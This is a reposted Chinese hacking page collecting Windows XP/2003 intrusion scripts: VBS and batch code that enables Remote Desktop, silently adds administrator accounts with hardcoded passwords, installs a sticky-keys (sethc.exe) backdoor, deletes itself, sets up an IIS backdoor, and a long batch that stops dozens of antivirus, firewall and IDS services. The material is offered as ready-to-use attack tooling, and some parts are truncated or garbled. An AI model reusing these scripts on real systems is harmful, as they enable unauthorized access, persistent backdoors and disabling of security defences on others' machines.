xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集

  • 时间:
  • 来源:互联网
  • 文章标签:
xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本+提权VBS 整理收集
2010年12月07日
  xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本
  vbson error resume next
  const HKEY_LOCAL_MACHINE = &H80000002
  strComputer = "."
  Set StdOut = WScript.StdOut
  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
  strComputer & "\root\default:StdRegProv")
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
  strValueName = "fDenyTSConnections"
  dwValue = 0
  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
  strValueName = "PortNumber"
  dwValue = 3389
  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
  strValueName = "PortNumber"
  dwValue = 3389
  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
  on error resume next
  dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
  On Error Resume Next
  Dim obj, success
  Set obj = CreateObject("WScript.Shell")
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
  加用户
  --------------------------------
  echo Windows Registry Editor Version 5.00>>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  echo "PortNumber"=dword:00000d3d>>3389.reg
  echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  echo "PortNumber"=dword:00000d3d>>3389.reg
  regedit /s 3389.reg
  del 3389.reg
  -------------------------------------------------
  vbs加用户精简版
  set w=createobject("wscript.shell"):w.run "net user hack echoeye /add",0:w.run "net localgroup administrators hack /add",0
  -----------------------------------------------------
  cmd.asp webshell 上传
  ---------------------------------------------------
  
  
  
  
  
  

  

  
  
  
  
  --------------------------------------------------------------------
  Shift后门
  -----------------------------------------
  @echo off
  cls
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo.
  echo Shift后门 By:Hack残少 QQ:297248524
  echo.
  echo 使用方法:本文件执行完毕后,
  echo 在终端界面按Shift 5次即可登陆系统!
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo.
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  echo 完成百分之 50
  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
  echo 完成百分之 80
  attrib c:\windows\system32\sethc.exe +h
  echo 完成百分之 90
  attrib c:\windows\system32\dllcache\sethc.exe +h
  echo 完成百分之 100
  cls
  echo.
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo 后门安装完毕!
  echo.
  echo 感谢您使用Shift后门
  echo.
  echo By:Hack残少 QQ:297248524
  echo.
  echo http://www.shenmicaobi.com/
  echo.
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  echo.
  echo. & pause
  exit
  --------------------------------------------------------------
  不依靠CMD添加用户的VBS代码
  set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  os="WinNT://"&wsnetwork.ComputerName
  Set ob=GetObject(os) '得到adsi接口,绑定
  Set oe=GetObject(os&"/Administrators,group") '属性,admin组
  Set od=ob.Create("user","test") '建立用户
  od.SetPassword "1234" '设置密码
  od.SetInfo '保存
  Set of=GetObject(os&"/test",user) '得到用户
  oe.add os&"/test"
  ------------------------------------------
  用vbs实现本地添加用户的脚本
  Dim WshShell
  set WshShell = CreateObject("wscript.Shell")
  WshShell.Run "cmd /k"
  for i = 1 to 3
  WScript.Sleep 500
  WshShell.SendKeys "net user admin" & i & " abcd@123 /add"
  WshShell.SendKeys "{ENTER}"
  next
  WshShell.SendKeys "exit"
  WshShell.SendKeys "{ENTER}"
  ---------------------------------------------
  上帝之门 执行成功 3389 管理员帐号任意密码登入 保存为.exe
  ------------------------
  MZ
  ------------------------
  IIs后门
  -------------------
  help1="IIS后门设置器 黑猫专用版"
  help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
  help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
  help4="例如: cscript.exe iis.vbs lh e:\"
  set Args = Wscript.Arguments
  if args.count telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "open 192.168.1.200" >>telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "{ENTER}" >>telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "engineer{ENTER}" >>telnet_tmp.vbs
  echo WScript.Sleep 300 >>telnet_tmp.vbs
  echo sh.SendKeys "ls {ENTER}">>telnet_tmp.vbs
  start telnet
  cscript //nologo telnet_tmp.vbs
  del telnet_tmp.vbs
  附录:
  对于SendKeys这个命令可以send什么,我们可以看下面的列表:
  BACKSPACE {BACKSPACE}, {BS}, or {BKSP}
  BREAK {BREAK}
  CAPS LOCK {CAPSLOCK}
  DEL or DELETE {DELETE} or {DEL}
  DOWN ARROW {DOWN}
  END {END}
  ENTER {ENTER}or ~
  ESC {ESC}
  HELP {HELP}
  HOME {HOME}
  INS or INSERT {INSERT} or {INS}
  LEFT ARROW {LEFT}
  NUM LOCK {NUMLOCK}
  PAGE DOWN {PGDN}
  PAGE UP {PGUP}
  PRINT SCREEN {PRTSC}
  RIGHT ARROW {RIGHT}
  SCROLL LOCK {SCROLLLOCK}
  TAB {TAB}
  UP ARROW {UP}
  F1 {F1}
  F2 {F2}
  F3 {F3}
  F4 {F4}
  F5 {F5}
  F6 {F6}
  F7 {F7}
  F8 {F8}
  F9 {F9}
  F10 {F10}
  F11 {F11}
  F12 {F12}
  F13 {F13}
  F14 {F14}
  F15 {F15}
  F16 {F16}
  SHIFT +
  CTRL ^
  ALT %
  二。Linux平台
  保证你的系统上存在expect这个可执行程序,保存以下代码到文件autoTelnet,并给与执行权限。详细操作察看命令expect
  #!/usr/bin/expect --
  set SERVER "192.168.1"
  set USER "myusername"
  set PASSWD "mypass"
  if { $argc } {
  spawn telnet $SERVER.$argv
  } else {
  spawn telnet $SERVER.200
  }
  expect "Password:"
  send "$PASSWD\n"
  expect "#"
  send "ls\n"
  interact
  关闭防火墙和杀毒软件的脚本
  @echo off
  net stop "Ecengine.exe" /y
  net stop "eSafe Protect Desktop" /y
  net stop "Esafe.exe" /y
  net stop "Espwatch.exe" /y
  net stop "eTrust EZ Firewall" /y
  net stop "F-Agnt95.exe" /y
  net stop "Findviru.exe" /y
  net stop "Fprot.exe" /y
  net stop "F-Prot.exe" /y
  net stop "F-PROT95" /y
  net stop "F-Prot95.exe" /y
  net stop "FP-WIN" /y
  net stop "Fp-Win.exe" /y
  net stop "Freedom 2" /y
  net stop "Frw.exe" /y
  net stop "F-STOPW" /y
  net stop "F-Stopw.exe" /y
  net stop "GNAT Box Lite" /y
  net stop "IAMAPP" /y
  net stop "Iamapp.exe" /y
  net stop "Iamserv.exe" /y
  net stop "Ibmasn.exe" /y
  net stop "Ibmavsp.exe" /y
  net stop "Icload95.exe" /y
  net stop "Icloadnt.exe" /y
  net stop "ICMON" /y
  net stop "Icmon.exe" /y
  net stop "Icsupp95.exe" /y
  net stop "Icsuppnt.exe" /y
  net stop "Iface.exe" /y
  net stop "Internet Alert 99" /y
  net stop "IOMON98" /y
  net stop "Iomon98.exe" /y
  net stop "Jedi.exe" /y
  net stop "LOCKDOWN2000" /y
  net stop "Lockdown2000.exe" /y
  net stop "Look'n'Stop" /y
  net stop "Look'n'Stop Lite" /y
  net stop "Lookout.exe" /y
  net stop "LUALL" /y
  net stop "Luall.exe" /y
  net stop "LUCOMSERVER" /y
  net stop "MCAFEE" /y
  net stop "McAfee Firewall" /y
  net stop "McAfee Internet Guard Dog Pro" /y
  net stop "Moolive.exe" /y
  net stop "Mpftray.exe" /y
  net stop "N32scanw.exe" /y
  net stop "NAVAPSVC" /y
  net stop "NAVAPW32" /y
  net stop "Navapw32.exe" /y
  net stop "NAVLU32" /y
  net stop "Navlu32.exe" /y
  net stop "Navnt.exe" /y
  net stop "NAVRUNR" /y
  net stop "NAVW32" /y
  net stop "Navw32.exe" /y
  net stop "NAVWNT" /y
  net stop "Navwnt.exe" /y
  net stop "NeoWatch" /y
  net stop "NISSERV" /y
  net stop "NISUM" /y
  net stop "Nisum.exe" /y
  net stop "NMAIN" /y
  net stop "Nmain.exe" /y
  net stop "Norman Personal Firewall" /y
  net stop "Normist.exe" /y
  net stop "NORTON" /y
  net stop "Norton AntiVirus Server" /y
  net stop "Norton Internet Security" /y
  net stop "Norton Personal Firewall 2001" /y
  net stop "Nupgrade.exe" /y
  net stop "NVC95" /y
  net stop "Nvc95.exe" /y
  net stop "Outpost.exe" /y
  net stop "Padmin.exe" /y
  net stop "Pavcl.exe" /y
  net stop "Pavsched.exe" /y
  net stop "Pavw.exe" /y
  net stop "Pc firewall" /y
  net stop "PC Viper" /y
  net stop "PCCIOMON" /y
  net stop "Ecengine.exe" /y
  net stop "eSafe Protect Desktop" /y
  net stop "Esafe.exe" /y
  net stop "Espwatch.exe" /y
  net stop "eTrust EZ Firewall" /y
  net stop "F-Agnt95.exe" /y
  net stop "Findviru.exe" /y
  net stop "Fprot.exe" /y
  net stop "F-Prot.exe" /y
  net stop "F-PROT95" /y
  net stop "F-Prot95.exe" /y
  net stop "FP-WIN" /y
  net stop "Fp-Win.exe" /y
  net stop "Freedom 2" /y
  net stop "Frw.exe" /y
  net stop "F-STOPW" /y
  net stop "F-Stopw.exe" /y
  net stop "GNAT Box Lite" /y
  net stop "IAMAPP" /y
  net stop "Iamapp.exe" /y
  net stop "Iamserv.exe" /y
  net stop "Ibmasn.exe" /y
  net stop "Ibmavsp.exe" /y
  net stop "Icload95.exe" /y
  net stop "Icloadnt.exe" /y
  net stop "ICMON" /y
  net stop "Icmon.exe" /y
  net stop "Icsupp95.exe" /y
  net stop "Icsuppnt.exe" /y
  net stop "Iface.exe" /y
  net stop "Internet Alert 99" /y
  net stop "IOMON98" /y
  net stop "Iomon98.exe" /y
  net stop "Jedi.exe" /y
  net stop "LOCKDOWN2000" /y
  net stop "Lockdown2000.exe" /y
  net stop "Look'n'Stop" /y
  net stop "Look'n'Stop Lite" /y
  net stop "Lookout.exe" /y
  net stop "LUALL" /y
  net stop "Luall.exe" /y
  net stop "LUCOMSERVER" /y
  net stop "MCAFEE" /y
  net stop "McAfee Firewall" /y
  net stop "McAfee Internet Guard Dog Pro" /y
  net stop "Moolive.exe" /y
  net stop "Mpftray.exe" /y
  net stop "N32scanw.exe" /y
  net stop "NAVAPSVC" /y
  net stop "NAVAPW32" /y
  net stop "Navapw32.exe" /y
  net stop "NAVLU32" /y
  net stop "Navlu32.exe" /y
  net stop "Navnt.exe" /y
  net stop "NAVRUNR" /y
  net stop "NAVW32" /y
  net stop "Navw32.exe" /y
  net stop "NAVWNT" /y
  net stop "Navwnt.exe" /y
  net stop "NeoWatch" /y
  net stop "NISSERV" /y
  net stop "NISUM" /y
  net stop "Nisum.exe" /y
  net stop "NMAIN" /y
  net stop "Nmain.exe" /y
  net stop "Norman Personal Firewall" /y
  net stop "Normist.exe" /y
  net stop "NORTON" /y
  net stop "Norton AntiVirus Server" /y
  net stop "Norton Internet Security" /y
  net stop "Norton Personal Firewall 2001" /y
  net stop "Nupgrade.exe" /y
  net stop "NVC95" /y
  net stop "Nvc95.exe" /y
  net stop "Outpost.exe" /y
  net stop "Padmin.exe" /y
  net stop "Pavcl.exe" /y
  net stop "Pavsched.exe" /y
  net stop "Pavw.exe" /y
  net stop "Pc firewall" /y
  net stop "PC Viper" /y
  net stop "PCCIOMON" /y
  net stop "PCCMAIN" /y
  net stop "PCCWIN98" /y
  net stop "Pccwin98.exe" /y
  net stop "Pcfwallicon.exe" /y
  net stop "Persfw.exe" /y
  net stop "PGP Gauntlet" /y
  net stop "POP3TRAP" /y
  net stop "Proxy +" /y
  net stop "PVIEW95" /y
  net stop "Rav7.exe" /y
  net stop "Rav7win.exe" /y
  net stop "Rescue.exe" /y
  net stop "RESCUE32" /y
  net stop "SAFEWEB" /y
  net stop "Safeweb.exe" /y
  net stop "Scan32.exe" /y
  net stop "Scan95.exe" /y
  net stop "Scanpm.exe" /y
  net stop "Scrscan.exe" /y
  net stop "Serv95.exe" /y
  net stop "Smc.exe" /y
  net stop "SMCSERVICE" /y
  net stop "Snort - Win32 GUI" /y
  net stop "Snort (Intrusion Detection System)" /y
  net stop "Sphinx.exe" /y
  net stop "Sphinxwall" /y
  net stop "Sweep95.exe" /y
  net stop "Sybergen Secure Desktop" /y
  net stop "Sybergen SyGate" /y
  net stop "SYMPROXYSVC" /y
  net stop "Tbscan.exe" /y
  net stop "Tca.exe" /y
  net stop "Tds2-98.exe" /y
  net stop "Tds2-Nt.exe" /y
  net stop "TermiNET" /y
  net stop "TGB:BOB" /y
  net stop "Tiny Personal Firewall" /y
  net stop "Vet95.exe" /y
  net stop "Vettray.exe" /y
  net stop "Vscan40.exe" /y
  net stop "Vsecomr.exe" /y
  net stop "VSHWIN32" /y
  net stop "Vshwin32.exe" /y
  net stop "VSSTAT" /y
  net stop "Vsstat.exe" /y
  net stop "WEBSCANX" /y
  net stop "Webscanx.exe" /y
  net stop "WEBTRAP" /y
  net stop "Wfindv32.exe" /y
  net stop "Wingate" /y
  net stop "WinProxy" /y
  net stop "WinRoute" /y
  net stop "WyvernWorks Firewall" /y
  net stop "Zonealarm" /y
  net stop "Zonealarm.exe" /y
  net stop "AVP32" /y
  net stop "LOCKDOWN2000" /y
  net stop "AVP.EXE" /y
  net stop "CFINET32" /y
  net stop "CFINET" /y
  net stop "ICMON" /y
  net stop "SAFEWEB" /y
  net stop "WEBSCANX" /y
  net stop "ANTIVIR" /y
  net stop "MCAFEE" /y
  net stop "NORTON" /y
  net stop "NVC95" /y
  net stop "FP-WIN" /y
  net stop "IOMON98" /y
  net stop "PCCWIN98" /y
  net stop "F-PROT95" /y
  net stop "F-STOPW" /y
  net stop "PVIEW95" /y
  net stop "NAVWNT /y
  net stop "NAVRUNR" /y
  net stop "NAVLU32" /y
  net stop "NAVAPSVC" /y
  net stop "NISUM" /y
  net stop "SYMPROXYSVC" /y
  net stop "RESCUE32" /y
  net stop "NISSERV" /y
  net stop "ATRACK" /y
  net stop "IAMAPP" /y
  net stop "LUCOMSERVER" /y
  net stop "LUALL" /y
  net stop "NMAIN" /y
  net stop "NAVW32" /y
  net stop "NAVAPW32" /y
  net stop "VSSTAT" /y
  net stop "VSHWIN32" /y
  net stop "AVSYNMGR" /y
  net stop "AVCONSOL" /y
  net stop "WEBTRAP" /y
  net stop "POP3TRAP" /y
  net stop "PCCMAIN" /y
  net stop "PCCIOMON" /y
  net stop "Virtual CD v4 Security service (SDK - Version)" /y
  net stop "Norton Internet Security Accounts Manager" /y
  net stop "Norton AntiVirus Auto-Protect" /y
  net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)" /y
  net stop "Symantec Event Manager" /y
  net stop "Symantec Proxy Service" /y
  net stop "Symantec Settings Manager" /y
  net stop "NT LM Security Support Provider" /y
  net stop "Protected Storage" /y
  net stop "TskSrv FTP Server" /y
  net stop "Norton AntiVirus Auto Protect Service" /y
  net stop "IPSEC Policy Agent" /y
  net stop "MonSvcNT" /y
  net stop "FTP Publishing Service" /y
  net stop "IPSEC Services" /y
  net stop "Symantec AntiVirus Client" /y
  net stop "Sygate Personal Firewall" /y
  net stop "AntiVir Service" /y
  net stop "SafeNet IKE Service" /y
  net stop "SafeNet Monitor Service" /y
  net stop "Sophos Anti-Virus" /y
  net stop "Sophos Anti-Virus Network" /y
  net stop "Sophos Anti-Virus Update" /y
  net stop "Firewall della connessione Internet (ICF) / Condivisione connessione Internet (ICS)" /y
  net stop "Norton Unerase Protection" /y
  net stop "Servizio Norton AntiVirus Auto-Protect" /y
  net stop "FireDaemon Service: svchost." /y
  net stop "V3MonNT" /y
  net stop "PC-Keeper Service" /y
  net stop "Verbindingsbeheer voor RAS" /y
  net stop "Servizi IPSEC" /y
  net stop "Agente criteri IPSEC" /y
  net stop "McShield" /y
  net stop "Smart Card" /y
  net stop "F-Secure Anti-Virus Firewall Daemon" /y
  net stop "F-Secure Automatic Update" /y
  net stop "F-Secure Gatekeeper Handler Starter" /y
  net stop "F-Secure Network Request Broker" /y
  net stop "F-Secure Policy Manager Server" /y
  net stop "Symantec AntiVirus" /y
  net stop "Symantec AntiVirus Definition Watcher" /y
  exit

本文链接http://www.taodudu.cc/news/show-647625.html